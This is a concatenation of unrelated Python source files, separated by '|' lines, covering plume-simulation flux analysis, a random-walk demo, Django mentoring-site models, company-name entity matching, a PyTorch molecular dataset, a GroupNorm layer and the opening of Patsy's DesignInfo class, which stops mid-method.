                           fields['y']/Ly - 0.5)
        r = np.sqrt(X**2 + Y**2)
        mask = ma.masked_outside(r, 0, r_max)
        p = self.read_vars(['p'])['p']
        #p_prime = self.pressure_fluctuation()
        w = self.read_vars(['w'])['w']
        w = velocity_interpolation(w, axis=1)
        # Lid_flux integrates the vertical velocity at the lid. if var='none'
        # it multiplies an array of ones with w, instead of another varible.
        w_mean = self.Lid_flux('none', r_lim, z_lim)
        for t_i in range(global_shape[0]):
            p_mean = np.mean(p[t_i,new_nz,:,:])
            covar = (w[t_i,new_nz,:,:] - w_mean[t_i])*(p[t_i, new_nz, :, :] - p_mean)
            lid = ma.masked_array(covar, mask.mask)
            budget[t_i] = lid.sum()
        return budget*dx*dy #dx is the computed from the Lx lenght
    def E_1(self):
        # br*z: reference buoyancy weighted by height, replicated in time.
        global_shape = self.params['global_shape']
        z = self.read_vars(['z'])['z']
        b = self.read_vars(['b'])['b']
        br = b[0]
        brz = np.zeros(global_shape)
        for t_i in range(global_shape[0]):
            for z_i in range(len(z)):
                brz[t_i, z_i] = br[z_i]*z[z_i]
        return brz
    def E_2(self):
        # Q*z: bottom heat flux weighted by height, replicated in time.
        global_shape = self.params['global_shape']
        z = self.read_vars(['z'])['z']
        Q = self.Q_flux()
        Qz0 = np.zeros(global_shape)
        for t_i in range(global_shape[0]):
            for z_i in range(len(z)):
                Qz0[t_i, z_i] = Q[z_i]*z[z_i]
        return Qz0
    def test(self):
        # NOTE(review): `file` is undefined here and read_vars only accepts
        # the variable list — this call raises as written; TODO fix or drop.
        f = self.read_vars(['u'], file)
        test_field = np.zeros_like(f['u']) # to verify the averaging
        return test_field
    def disk_average(self, var, r_lim):
        """
        Computes the average in a horizontal disk, neglecting the sponge layers
        in the borders, and not merging subfiles. Only works for horizontal
        subdomains (so far).
        var a variable in string format. It can be:
             - a var in netCDF file. e.g. 'b', 'u', 'w', etc.
             - 'NN' for squared Brunt-Vaisala freq.
             - 'KE' for kinetic energy.
             - The list will increase as it increases the number of functions.
        """
        # change the mask for the one in Flux
        npx = self.params['npx']
        npy = self.params['npy']
        npz = self.params['npz']
        number_domains = npx*npy*npz # so far only works for number_domains<100
        Lx = self.params['Lx']
        Ly = self.params['Ly']
        Lz = self.params['Lz']
        x0 = Lx/2 # center point in the x domain.
        y0 = Ly/2 # center point in the y domain.
        nz = self.params['nz']
        if var == 'NN': # maybe interpolate is field...
            # NN comes from a vertical difference, so it has one fewer level.
            nz = nz - 1
        t = self.read_vars(['t'])['t']
        n_time = t.shape[0]
        r_max = r_lim #0.45 # as in forced_plume_nudging.py
        z_max = 0.95
        means = np.zeros((n_time, nz))
        fields = self.read_vars([var, 'x', 'y'])
        if var in ['u', 'v', 'w']:
            axis_vel = {'u': 3, 'v': 2, 'w':1}
            fields[var] = velocity_interpolation(fields[var], axis=axis_vel[var])
        XX, YY = np.meshgrid(fields['x']/Lx - 0.5,
                             fields['y']/Ly - 0.5)
        r = np.sqrt(XX**2 + YY**2)
        mask = ma.masked_outside(r, 0, r_max)
        #mask_2 = ma.masked_outside(ZZ, 0, z_max)
        for t in range(n_time):
            for z_lvl in range(nz):
                field_new = ma.masked_array(fields[var][t, z_lvl, :, :], mask.mask)
                means[t, z_lvl] = field_new.mean()
        #means = means/number_domains
        return means
    def Flux(self, flux, r_lim, z_lim):
        """
        Computes the mass, momentum and buoyancy fluxes in a cylindrical
        control volume, defined by the nudging (the sponge layer) limits
        flux - a string indicating the type of flux: "mass", "momentum" or
               "buoyancy".
        Returns the time series of the flux summed over the volume.
        """
        if flux == 'mass':
            set_integrand = lambda x: x
        elif flux == 'momentum':
            set_integrand = lambda x: x**2
        elif flux == 'buoyancy':
            b = self.read_vars(['b'])['b']
            set_integrand = lambda x: x*b
        npx = self.params['npx']
        Lx = self.params['Lx']
        Ly = self.params['Ly']
        Lz = self.params['Lz']
        nz = self.params['nz']
        dx = Lx/npx
        t = self.read_vars(['t'])['t']
        n_time = t.shape[0]
        r_max = r_lim # as in forced_plume_nudging.py
        z_max = z_lim
        new_nz = int(nz*z_lim)
        flux = np.zeros(n_time)
        fields = self.read_vars(['w', 'x', 'y', 'z'])
        w = velocity_interpolation(fields['w'], axis=1)
        XX, YY = np.meshgrid(fields['x']/Lx - 0.5,
                             fields['y']/Ly - 0.5)
        r = np.sqrt(XX**2 + YY**2)
        mask_1 = ma.masked_outside(r, 0, r_max)
        #mask_2 = ma.masked_outside(ZZ, 0, z_max)
        # defining integrand
        integrand = set_integrand(w)
        for t in range(n_time):
            aux = np.zeros(new_nz)
            for z_i in range(new_nz):
                field_new = ma.masked_array(integrand[t, z_i], mask_1.mask)
                aux[z_i] = field_new.sum()
            flux[t] = aux.sum()
        return flux
    def Flux_levels(self, flux, r_lim=0.45):
        """
        Computes the mass, momentum and buoyancy fluxes in a cylindrical
        control volume, defined by the nudging (the sponge layer) limits
        flux - a string indicating the type of flux: "mass", "momentum" or
               "buoyancy".
        Like Flux, but returns the (time, level) array instead of the
        vertically-summed series.
        """
        if flux == 'mass':
            set_integrand = lambda x: x
        elif flux == 'momentum':
            set_integrand = lambda x: x**2
        elif flux == 'buoyancy':
            b = self.read_vars(['b'])['b']
            set_integrand = lambda x: x*b
        npx = self.params['npx']
        Lx = self.params['Lx']
        Ly = self.params['Ly']
        Lz = self.params['Lz']
        nz = self.params['nz']
        dx = self.params['dx']
        dy = self.params['dy']
        t = self.read_vars(['t'])['t']
        n_time = t.shape[0]
        r_max = r_lim # as in forced_plume_nudging.py
        z_max = 0.95
        flux = np.zeros((n_time, nz))
        fields = self.read_vars(['w', 'x', 'y', 'z'])
        w = velocity_interpolation(fields['w'], axis=1)
        XX, YY = np.meshgrid(fields['x']/Lx - 0.5,
                             fields['y']/Ly - 0.5)
        r = np.sqrt(XX**2 + YY**2)
        mask_1 = ma.masked_outside(r, 0, r_max)
        #mask_2 = ma.masked_outside(ZZ, 0, z_max)
        # defining integrand
        integrand = set_integrand(w)
        for t in range(n_time):
            for z_i in range(nz):
                field_new = ma.masked_array(integrand[t, z_i], mask_1.mask)
                flux[t, z_i] = field_new.sum()
        return flux
    def Surface_flux(self, var, r_lim, z_lim):
        """
        Mean flux of `var` through the surface of the cylindrical control
        volume: radial transport through the side ring plus vertical
        transport through the lid.
        """
        Lx = self.params['Lx']
        Ly = self.params['Ly']
        Lz = self.params['Lz']
        nz = self.params['nz']
        t = self.read_vars(['t'])['t']
        n_time = t.shape[0]
        r_max = r_lim # as in forced_plume_nudging.py
        z_max = z_lim
        new_nz = int(nz*z_lim)
        budget = np.zeros(n_time)
        fields = self.read_vars([var, 'w', 'u', 'v', 'x', 'y'])
        w = velocity_interpolation(fields['w'], axis=1)
        v = velocity_interpolation(fields['v'], axis=2)
        u = velocity_interpolation(fields['u'], axis=3)
        X, Y = np.meshgrid(fields['x']/Lx - 0.5,
                           fields['y']/Ly - 0.5)
        r = np.sqrt(X**2 + Y**2)
        mask = ma.masked_outside(r, 0, r_max)
        # One-cell-wide ring just outside the disk, built from shifted masks.
        m = mask.mask*1
        mask_ring = np.roll(m, -1, axis=0) + np.roll(m, 1, axis=0)
        mask_ring += np.roll(m, -1, axis=1) + np.roll(m, 1, axis=1)
        mask_ring -= 4*m
        for t_i in range(n_time):
            sides = 0
            for z_i in range(new_nz-1):
                f = fields[var][t_i,z_i]
                rad_proy = (u[t_i,z_i]*X + v[t_i,z_i]*Y)/r
                aux = ma.masked_array(f*rad_proy, mask_ring>=0)
                sides += aux.mean()
            # NOTE(review): `f` here is the field at the LAST side level
            # (z_i == new_nz-2), not at the lid level new_nz — confirm this
            # is intended before trusting the lid term.
            lid = ma.masked_array(f*w[t_i, new_nz], mask.mask)
            budget[t_i] = sides + lid.mean()
        return budget
    def Lateral_flux(self, var, r_lim, z_lim):
        """
        Radial transport of `var` through the side ring of the cylindrical
        control volume, summed over the ring cells and side levels.
        """
        Lx = self.params['Lx']
        Ly = self.params['Ly']
        Lz = self.params['Lz']
        nz = self.params['nz']
        t = self.read_vars(['t'])['t']
        n_time = t.shape[0]
        dx = self.params['dx']
        dy = self.params['dy']
        dz = self.params['dz']
        r_max = r_lim # as in forced_plume_nudging.py
        z_max = z_lim
        new_nz = int(nz*z_lim)
        budget = np.zeros(n_time)
        fields = self.read_vars([var, 'u', 'v', 'x', 'y'])
        v = velocity_interpolation(fields['v'], axis=2)
        u = velocity_interpolation(fields['u'], axis=3)
        X, Y = np.meshgrid(fields['x']/Lx - 0.5,
                           fields['y']/Ly - 0.5)
        r = np.sqrt(X**2 + Y**2)
        mask = ma.masked_outside(r, 0, r_max)
        # One-cell-wide ring just outside the disk, built from shifted masks.
        m = mask.mask*1
        mask_ring = np.roll(m, -1, axis=0) + np.roll(m, 1, axis=0)
        mask_ring += np.roll(m, -1, axis=1) + np.roll(m, 1, axis=1)
        mask_ring -= 4*m
        for t_i in range(n_time):
            sides = 0
            for z_i in range(new_nz-1):
                f = fields[var][t_i,z_i]
                # Radial projection of the horizontal velocity.
                rad_proy = (u[t_i,z_i]*X + v[t_i,z_i]*Y)/r
                aux = ma.masked_array(f*rad_proy, mask_ring>=0)
                sides += aux.sum()
            budget[t_i] = sides
        return budget
    def Lid_flux(self, var, r_lim, z_lim):
        # Mean vertical transport of `var` through the lid disk at relative
        # height z_lim.  var='none' integrates w alone (field of ones).
        Lx = self.params['Lx']
        Ly = self.params['Ly']
        Lz = self.params['Lz']
        nz = self.params['nz']
        t = self.read_vars(['t'])['t']
        n_time = t.shape[0]
        r_max = r_lim # as in forced_plume_nudging.py
        z_max = z_lim
        new_nz = int(nz*z_lim)
        budget = np.zeros(n_time)
        fields = self.read_vars([var, 'w', 'x', 'y'])
        w = velocity_interpolation(fields['w'], axis=1)
        X, Y = np.meshgrid(fields['x']/Lx - 0.5,
                           fields['y']/Ly - 0.5)
        r = np.sqrt(X**2 + Y**2)
        mask = ma.masked_outside(r, 0, r_max)
        for t_i in range(n_time):
            f = fields[var][t_i,new_nz,:,:]
            lid = ma.masked_array(f*w[t_i,new_nz,:,:], mask.mask)
            budget[t_i] = lid.mean()
        return budget
    def Volume_integral(self, var, r_lim, z_lim):
        """
        Integral of `var` over the cylindrical control volume (disk of
        radius r_lim up to relative height z_lim), times the cell volume.
        """
        Lx = self.params['Lx']
        Ly = self.params['Ly']
        Lz = self.params['Lz']
        nz = self.params['nz']
        dx = self.params['dx']
        dy = self.params['dy']
        dz = self.params['dz']
        t = self.read_vars(['t'])['t']
        n_time = t.shape[0]
        r_max = r_lim # as in forced_plume_nudging.py
        z_max = z_lim
        new_nz = int(nz*z_lim)
        budget = np.zeros(n_time)
        fields = self.read_vars([var, 'x', 'y'])
        X, Y = np.meshgrid(fields['x']/Lx - 0.5,
                           fields['y']/Ly - 0.5)
        r = np.sqrt(X**2 + Y**2)
        mask = ma.masked_outside(r, 0, r_max)
        for t_i in range(n_time):
            aux = np.zeros(new_nz)
            for z_i in range(new_nz):
                field_new = ma.masked_array(fields[var][t_i,z_i],mask.mask)
                aux[z_i] = field_new.sum()
            budget[t_i] = aux.sum()
        return budget*dx*dy*dz
def velocity_interpolation(a, axis=-1):
    """
    Linear interpolation for velocity in a staggered type C grid.
    Z-convention (nz, ny, nx)

    A plane of zeros is prepended at the lower boundary along `axis`,
    then neighbouring values are averaged pairwise, so the output has
    exactly the same shape as the input.

    Parameters
    ----------
    a : array_like
        Input array
    axis : int, optional
        The axis along which the interpolation is done, default is the
        last axis.

    Returns
    -------
    a_interp : ndarray
        Array with same dimension as input.
    """
    ndim = len(a.shape)
    # Build a padded copy of `a` with one extra zero slab at the
    # lower boundary along `axis`.
    padded_shape = list(a.shape)
    padded_shape[axis] += 1
    padded = np.zeros(tuple(padded_shape))
    upper = [slice(None)] * ndim
    upper[axis] = slice(1, None)
    padded[tuple(upper)] = a
    # Average each pair of neighbours along `axis`.
    lo = [slice(None)] * ndim
    hi = [slice(None)] * ndim
    lo[axis] = slice(None, -1)
    hi[axis] = slice(1, None)
    return (padded[tuple(lo)] + padded[tuple(hi)]) / 2
def find_z_plume(array, percent):
    """
    Returns the index corresponding to the height of the plume.

    The first entry of `array` is ignored (lowest level), and the plume
    top is taken as the level whose value is closest to ``percent`` times
    the profile maximum.

    Parameters
    ----------
    array : array_like
        must be the momentum flux computed with Flux_levels.
    percent : float between 0 to 1
        the criteria for the plume heigth. Normally is 10% (i.e. 0.1)
        of the maximum momentum flux.

    Returns
    -------
    idx : int
        index of the top limit.
    """
    profile = np.asarray(array[1:])
    target = profile.max() * percent
    # +1 compensates for the dropped first level.
    return np.abs(profile - target).argmin() + 1
def z_r(b):
    """
    height at which the fluid parce with buoyancy b would reside if the
    buoyancy field will be adiabatically rearranged to a state of static
    equilibrium.

    NOTE(review): assumes a background buoyancy gradient of 1e-2 and a
    reference height of 0.5 — confirm against the simulation setup.
    """
    background_gradient = 1e-2
    reference_height = 0.5
    return reference_height + b / background_gradient
def mixing_efficiency(ϕb, ϕz, ϕp):
    """Mixing efficiency from the three flux terms: (ϕb - ϕz)/(ϕb - ϕp)."""
    numerator = ϕb - ϕz
    denominator = ϕb - ϕp
    return numerator / denominator
|
Your input
[1,3,5,4,7]
Output
3
Expected
3
Your input
[1,3,5,6,7]
Output
5
Expected
5
|
# -*- coding: utf-8 -*-
"""
Two-agent random walk on a 100x100 grid.

Creates two agents at random positions, moves each of them two random
steps, reports the distance between them and the agent with the largest
second coordinate, then plots both positions.

Created on Sat Oct 28 18:29:53 2017
@author: amandaf
"""
import random, operator, matplotlib.pyplot

GRID_SIZE = 100   # grid coordinates run 0..GRID_SIZE-1
NUM_STEPS = 2     # random-walk steps per agent


def make_agent():
    """Return a new agent at a uniformly random [row, col] position."""
    return [random.randint(0, GRID_SIZE - 1), random.randint(0, GRID_SIZE - 1)]


def random_step(agent):
    """Move the agent one step: +/-1 in each coordinate, chosen at random.

    NOTE(review): as in the original, this can step an agent off the
    0..99 grid; add clamping or wrap-around if bounds matter.
    """
    if random.random() < 0.5:
        agent[0] += 1
    else:
        agent[0] -= 1
    if random.random() < 0.5:
        agent[1] += 1
    else:
        agent[1] -= 1


agents = []

# First agent: create, show initial state, then walk.
agents.append(make_agent())
print(agents)
for _ in range(NUM_STEPS):
    random_step(agents[0])

# Second agent: create and walk.
agents.append(make_agent())
for _ in range(NUM_STEPS):
    random_step(agents[1])
print(agents)

# Euclidean distance between the two agents.
distance = ((agents[0][0] - agents[1][0]) ** 2
            + (agents[0][1] - agents[1][1]) ** 2) ** 0.5
print(distance)

# Agent with the largest second coordinate.
print(max(agents, key=operator.itemgetter(1)))

# Plot positions (scatter takes x=col index [1], y=row index [0]).
# Fixed: agent 1 was previously scattered twice (once default-coloured,
# once red on top) — the duplicate call is removed.
matplotlib.pyplot.ylim(0, GRID_SIZE - 1)
matplotlib.pyplot.xlim(0, GRID_SIZE - 1)
matplotlib.pyplot.scatter(agents[0][1], agents[0][0])
matplotlib.pyplot.scatter(agents[1][1], agents[1][0], color='red')
matplotlib.pyplot.show()
|
"""Contains all the table definitions of the project."""
from django.db import models
from django.contrib.auth import get_user_model
# Create your models here.
# Need to figure out how to include the following
# Are you interested in serving as a mentor to students who identify as any of the following (check all that may apply)
class Ally(models.Model):
    """
    Ally model contains the details of the IBA allies.

    A single table holds the union of fields used by every user type
    (grad/faculty, staff, undergraduate); fields not relevant to a given
    user type are left at their defaults.
    """
    # One ally record per Django auth user; deleting the user deletes the ally.
    user = models.ForeignKey(
        get_user_model(),
        on_delete=models.CASCADE,
    )
    hawk_id = models.CharField(max_length=100)
    image_url = models.CharField(max_length=500,
        default="https://sepibafiles.blob.core.windows.net/sepibacontainer/blank-profile-picture.png")
    user_type = models.CharField(max_length=25) # student/faculty/..
    ## Additional authentication fields
    # Set when an admin forces a password reset on next login.
    reset_password = models.BooleanField(default=False)
    def __str__(self):
        return self.hawk_id
    ## Grad and Faculty
    area_of_research = models.CharField(max_length=500, null=True)
    openings_in_lab_serving_at = models.BooleanField(default=False)
    description_of_research_done_at_lab = models.CharField(max_length=500, null=True)
    interested_in_mentoring = models.BooleanField(default=False)
    interested_in_mentor_training = models.BooleanField(default=False)
    willing_to_offer_lab_shadowing = models.BooleanField(default=False)
    interested_in_connecting_with_other_mentors = models.BooleanField(default=False)
    willing_to_volunteer_for_events = models.BooleanField(default=False)
    works_at = models.CharField(max_length=200, null=True)
    ## Staff
    people_who_might_be_interested_in_iba = models.BooleanField(default=False)
    how_can_science_ally_serve_you = models.CharField(max_length=500, null=True)
    ## Undergraduate
    year = models.CharField(max_length=30)
    major = models.CharField(max_length=50)
    information_release = models.BooleanField(default=False)
    interested_in_being_mentored = models.BooleanField(default=False)
    identity = models.CharField(max_length=200, blank=True)
    interested_in_joining_lab = models.BooleanField(default=False)
    has_lab_experience = models.BooleanField(default=False)
class AllyMentorRelation(models.Model):
    """
    AllyMentorRelation table is used for mapping One to One relationship between allies and their mentors.

    Each ally has at most one mentor (OneToOneField on `ally`), while a
    mentor may appear in many rows (ForeignKey on `mentor`).
    """
    ally = models.OneToOneField(
        Ally,
        related_name='ally_mentor_relation',
        on_delete=models.CASCADE,
    )
    mentor = models.ForeignKey(
        Ally,
        related_name='mentor',
        on_delete=models.CASCADE,
    )
class AllyMenteeRelation(models.Model):
    """
    AllyMenteeRelation table is used for mapping One to Many relationship between allies and their mentees.

    Both sides are ForeignKeys, so one ally can have many mentees.
    """
    ally = models.ForeignKey(
        Ally,
        related_name='ally_mentee_relation',
        on_delete=models.CASCADE,
    )
    mentee = models.ForeignKey(
        Ally,
        related_name='mentee',
        on_delete=models.CASCADE,
    )
class StudentCategories(models.Model):
    """
    StudentCategories table contains the different special categories an uiowa student can belong to.

    Each row is one combination of boolean category flags; rows are linked
    to allies through AllyStudentCategoryRelation.
    """
    under_represented_racial_ethnic = models.BooleanField(default=False)
    first_gen_college_student = models.BooleanField(default=False)
    transfer_student = models.BooleanField(default=False)
    lgbtq = models.BooleanField(default=False)
    low_income = models.BooleanField(default=False)
    rural = models.BooleanField(default=False)
    disabled = models.BooleanField(default=False)
class AllyStudentCategoryRelation(models.Model):
    """
    AllyStudentCategoryRelation table is used for mapping Many to Many relationship between allies and StudentCategories table.
    """
    ally = models.ForeignKey(
        Ally,
        on_delete=models.CASCADE,
    )
    student_category = models.ForeignKey(
        StudentCategories,
        on_delete=models.CASCADE,
    )
class Event(models.Model):
    """
    Event table contains information about the IBA science alliance events.

    The *_selected / mentor_status / research_field / special_category
    fields hold the filter criteria used when inviting allies;
    invite_all overrides them.
    """
    title = models.CharField(max_length=200, null=True)
    description = models.CharField(max_length=1000, null=True)
    start_time = models.DateTimeField(default=None, null=True)
    end_time = models.DateTimeField(default=None, null=True)
    allday = models.CharField(max_length=500, null=True)
    location = models.CharField(max_length=500, null=True)
    # Denormalized counters kept alongside the relation tables.
    num_invited = models.IntegerField(default=0)
    num_attending = models.IntegerField(default=0)
    role_selected = models.CharField(max_length=500, null=True)
    school_year_selected = models.CharField(max_length=500, null=True)
    mentor_status = models.CharField(max_length=500, null=True)
    research_field = models.CharField(max_length=500, null=True)
    invite_all = models.CharField(max_length=500, null=True)
    special_category = models.CharField(max_length=500, null=True)
class EventInviteeRelation(models.Model):
    """
    EventInviteeRelation table contains information about the Event ally mappings.
    One event can have many allies invited and vice versa.
    """
    event = models.ForeignKey(Event,
                              on_delete=models.CASCADE
                              )
    ally = models.ForeignKey(Ally,
                             on_delete=models.CASCADE
                             )
class Announcement(models.Model):
    """
    Announcement table contains information about the announcements made by admin.
    """
    # Hawk ID / username of the admin who posted the announcement.
    username = models.CharField(max_length=100)
    title = models.CharField(max_length=200, null=True)
    description = models.CharField(max_length=1000, null=True)
    created_at = models.DateTimeField()
class EventAttendeeRelation(models.Model):
    """
    EventAttendeeRelation table contains information about the Event ally mappings.
    One event can have many allies registered and vice versa.
    """
    event = models.ForeignKey(Event,
                              on_delete=models.CASCADE
                              )
    ally = models.ForeignKey(Ally,
                             on_delete=models.CASCADE
                             )
|
import spacy
import pickle
from fuzzywuzzy import fuzz #fuzz value to check similarity between two strings
import read_symbol
def get_list(sentence):
    """Extract company mentions from `sentence` and map them to securities.

    Runs spaCy NER over the sentence, fuzzy-matches each entity against
    the known company names, and for entities whose best match reaches
    the threshold returns ``[entity_text, security_symbol]`` pairs.

    Parameters
    ----------
    sentence : str
        Free text possibly mentioning one or more companies.

    Returns
    -------
    list of [str, str]
        ``[entity_text, security_symbol]`` for each confidently-matched entity.
    """
    MIN_FUZZ_VALUE = 55  # minimum similarity (0-100) to accept a match
    # NOTE(review): loading the model per call is slow; consider caching
    # it at module level if this is called repeatedly.
    nlp = spacy.load('en_core_web_sm')  # pretrained model
    company_name = read_symbol.get_company_name()    # list containing company names
    security = read_symbol.get_company_security()    # list containing security symbols
    final_list = []  # output list of [entity_text, security]
    doc = nlp(sentence)  # used to find entities
    for ent in doc.ents:
        # Score the entity against every known company name and keep only
        # the single best match, so one entity maps to one company.
        fuzz_values = [fuzz.ratio(ent.text, name) for name in company_name]
        best_value = max(fuzz_values)
        if best_value >= MIN_FUZZ_VALUE:
            final_list.append([ent.text, security[fuzz_values.index(best_value)]])
    return final_list
|
import numpy as np
import torch
from torch.utils.data import Dataset
from ..wrappers import *
from .. import grids
def scale_func_sigmoid(break_point=1.2, steepness=3.):
    """Build a decreasing sigmoid scaling function.

    The constants are chosen so that the returned function equals
    exactly 0.5 at ``x = break_point``; ``steepness`` controls how
    sharply it falls off around that point.

    Returns
    -------
    callable
        ``f(x) -> float`` (also works elementwise on arrays).
    """
    exp_bp = np.exp(steepness * break_point)
    centre = np.log(exp_bp - 2.) / steepness
    amplitude = (1. - exp_bp) / (2. - exp_bp)

    def target_scale(x):
        return amplitude / (1. + np.exp((x - centre) * steepness))

    return target_scale
class MolDataset(Dataset):
    """Mol dataset.

    PyTorch ``Dataset`` yielding ``(grid, target, index)`` tuples, where the
    grid is built on the fly from a pdb file (via a GridMaker) or read from
    a pre-computed grid file, depending on ``input_is_pdb``.
    """
    def __init__(self, csv_table,
                 root_dir='.',
                 target_col='target',
                 path_col='path',
                 input_is_pdb=True,
                 grid_maker=None,
                 bin_size=1.0,
                 grid_transform=None,
                 pdb_transform=None,
                 target_transform=None,
                 add_index=False,
                 remove_grid=False):
        """
        Args:
            csv_table (pandas.DataFrame): Must contain columns specified in target_col and path_col
            root_dir (string, optional): Directory with all the samples (default: '.')
            target_col (string, optional): Name of the target column (default: 'target')
            path_col (string, optional): Name of the sample-path column (default: 'path')
            input_is_pdb (bool, optional): Indicates that data samples are in pdb format (default: True).
            grid_maker (class GridMaker, optional): Custom GridMaker (default: None)
            bin_size (float, optional): Grid bin size in Angstroms (default: 1.0)
            grid_transform (callable, optional): Optional transform to be applied on a grid. Returns numpy.array. (default: None).
            pdb_transform (callable, optional): Optional transform to be applied on a sample. Returns path to new pdb. (default: None).
            target_transform (callable, optional): Optional transform to be applied on a sample. Returns single float (default: None).
            add_index (bool, optional): Currently unused; samples always include the index (default: False).
            remove_grid (bool, optional): Delete the grid file after reading it (default: False).
        """
        # Validate the table up front so bad input fails at construction time.
        if path_col not in csv_table.columns:
            raise ValueError('Table must contain column "%s"' % path_col)
        if target_col not in csv_table.columns:
            raise ValueError('Table must contain column "%s"' % target_col)
        self.csv = csv_table
        self.target_list = np.array(self.csv[target_col], dtype=float)
        self.path_list = np.array(self.csv[path_col])
        self.root_dir = root_dir
        self.grid_transform = grid_transform
        self.pdb_transform = pdb_transform
        self.target_transform = target_transform
        self.input_is_pdb = input_is_pdb
        self.add_index = add_index
        self.remove_grid = remove_grid
        # A GridMaker is only needed when grids are built from pdb files.
        if self.input_is_pdb:
            self.bin_size = bin_size
            if not grid_maker:
                self.grid_maker = grids.GridMaker()
            else:
                self.grid_maker = grid_maker
    '''
    def make_grid(self, pdb_path, remove_tmp=True, hsd2his=True):
        if hsd2his:
            tmp_file = pdb_path + '.tmp'
            utils.hsd2his(pdb_path, tmp_file)
        else:
            tmp_file = pdb_path
        bin_size = self.bin_size
        props_file = self.grid_maker.properties_file
        types_file = self.grid_maker.types_file
        nchannels = self.grid_maker.nchannels
        grid = molgrid.make_grid(tmp_file, props_file, types_file, bin_size, nchannels)
        if hsd2his and remove_tmp:
            remove_files([tmp_file])
        return grid
    '''
    def __len__(self):
        # Number of samples == number of rows in the table.
        return self.csv.shape[0]
    def __getitem__(self, idx):
        # get sample path
        # NOTE(review): os, file_absent_error, remove_files and logging appear
        # to come from the ``from ..wrappers import *`` star import — confirm.
        local_path = self.path_list[idx]
        full_path = os.path.join(self.root_dir, local_path)
        file_absent_error(full_path)
        grid_path = None
        if self.input_is_pdb:
            # transform pdb if needed
            if self.pdb_transform:
                full_path = self.pdb_transform(full_path)
            try:
                grid = self.grid_maker.make_grid(full_path, self.bin_size)
            except Exception as e:
                logging.error('Failed creating grid for %s' % full_path)
                logging.exception(e)
                raise
        else:
            grid_path = full_path
        # Pre-computed grid: read it, restore its shape, optionally delete it.
        if grid_path:
            dims, grid = self.grid_maker.read_grid(grid_path)
            grid = grid.reshape(dims)
            if self.remove_grid:
                remove_files([grid_path])
        # trasform grid
        if self.grid_transform:
            grid = self.grid_transform(grid)
        grid = torch.from_numpy(grid)
        # read and transform target
        target = self.target_list[idx]
        if self.target_transform:
            target = self.target_transform(target)
        #if self.add_index:
        # NOTE(review): np.long was removed in NumPy >= 1.24; consider int(idx).
        sample = (grid.type(torch.FloatTensor), np.float32(target), np.long(idx))
        #else:
        #    sample = (grid.type(torch.FloatTensor), np.float32(target))
        return sample
|
# How often the scheduler wakes up to poll for work, in seconds.
SCHEDULER_INTERVAL_IN_SECONDS = 1
# Upper bound on instances the scheduler may run at the same time.
SCHEDULER_MAX_SIMULTANEOUS_INSTANCES = 3
|
import torch
from .module import Module
class GroupNorm2D(Module):
    r"""Applies Group Normalization over a mini-batch of inputs as described in
    the paper `Group Normalization`_ .
    .. math::
        y = \frac{x - \mathrm{E}[x]}{ \sqrt{\mathrm{Var}[x] + \epsilon}} * \gamma + \beta
    The mean and standard-deviation are calculated per sample and per group
    of channels, over the channels within the group and the spatial
    dimensions. :math:`\gamma` and :math:`\beta` are hyper-parameters
    Shape:
        - Input: :math:`(N, C, H, W)`, with :math:`C` divisible by ``group``
        - Output: :math:`(N, C, H, W)` (same shape as input)
    Examples:
        >>> input = torch.randn(32, 64, 32, 32)
        >>> # With Default Hyper-Parameters
        >>> m = nn.GroupNorm2D(gamma=1, beta=0.5, group=32, eps=1e-5)
        >>> # Activating the module
        >>> output = m(input)
    .. _`Group Normalization`: https://arxiv.org/abs/1803.08494
    """
    def __init__(self, gamma=1, beta=0.5, group=32, eps=1e-5):
        super(GroupNorm2D, self).__init__()
        self.gamma = gamma      # fixed (non-learnable) scale
        self.beta = beta        # fixed (non-learnable) shift
        self.group = group      # number of channel groups
        self.eps = eps          # numerical-stability constant
    def _check_input_dim(self, inputs):
        # Only 4D (N, C, H, W) inputs are supported.
        if inputs.dim() != 4:
            raise ValueError('expected 4D input (got {}D input)'
                             .format(inputs.dim()))
    def forward(self, inputs):
        self._check_input_dim(inputs)
        N, C, H, W = inputs.size()
        x = inputs.view(N, self.group, C // self.group, H, W)
        # Bug fix: statistics were previously taken over dim 1 (the *group*
        # axis), i.e. across groups — not Group Normalization.  GN computes
        # mean/var per sample and per group, over the channels within the
        # group and the spatial dims (dims 2, 3, 4), with biased variance.
        mean = x.mean(dim=[2, 3, 4], keepdim=True)
        var = x.var(dim=[2, 3, 4], unbiased=False, keepdim=True)
        x = (x - mean) / torch.sqrt(var + self.eps)
        x = x.view(N, C, H, W)
        return x * self.gamma + self.beta
|
# This file is part of Patsy
# Copyright (C) 2011-2012 Nathaniel Smith <njs@pobox.com>
# See file COPYING for license information.
# This file defines the main class for storing metadata about a model
# design. It also defines a 'value-added' design matrix type -- a subclass of
# ndarray that represents a design matrix and holds metadata about its
# columns. The intent is that these are useful and usable data structures
# even if you're not using *any* of the rest of patsy to actually build
# your matrices.
# These are made available in the patsy.* namespace
__all__ = ["DesignInfo", "DesignMatrix"]
import numpy as np
from patsy import PatsyError
from patsy.util import atleast_2d_column_default
from patsy.compat import OrderedDict
from patsy.util import repr_pretty_delegate, repr_pretty_impl
from patsy.constraint import linear_constraint
class DesignInfo(object):
    """A DesignInfo object holds metadata about a design matrix.
    This is the main object that Patsy uses to pass information to
    statistical libraries. Usually encountered as the `.design_info` attribute
    on design matrices.
    """
    def __init__(self, column_names,
                 term_slices=None, term_name_slices=None,
                 builder=None):
        """Build the column/term index structures.
        :arg column_names: column-name strings, in order.
        :arg term_slices: optional ordered (Term -> slice) pairs.
        :arg term_name_slices: optional ordered (name -> slice) pairs;
            mutually exclusive with `term_slices`.
        :arg builder: optional builder object, stored as-is.
        """
        # Maps each column name to its integer position, preserving order.
        self.column_name_indexes = OrderedDict(zip(column_names,
                                                   range(len(column_names))))
        if term_slices is not None:
            #: An OrderedDict mapping :class:`Term` objects to Python
            #: func:`slice` objects. May be None, for design matrices which
            #: were constructed directly rather than by using the patsy
            #: machinery. If it is not None, then it
            #: is guaranteed to list the terms in order, and the slices are
            #: guaranteed to exactly cover all columns with no overlap or
            #: gaps.
            self.term_slices = OrderedDict(term_slices)
            if term_name_slices is not None:
                raise ValueError("specify only one of term_slices and "
                                 "term_name_slices")
            term_names = [term.name() for term in self.term_slices]
            #: And OrderedDict mapping term names (as strings) to Python
            #: :func:`slice` objects. Guaranteed never to be None. Guaranteed
            #: to list the terms in order, and the slices are
            #: guaranteed to exactly cover all columns with no overlap or
            #: gaps. Name overlap is allowed between term names and column
            #: names, but it is guaranteed that if it occurs, then they refer
            #: to exactly the same column.
            self.term_name_slices = OrderedDict(zip(term_names,
                                                    self.term_slices.values()))
        else: # term_slices is None
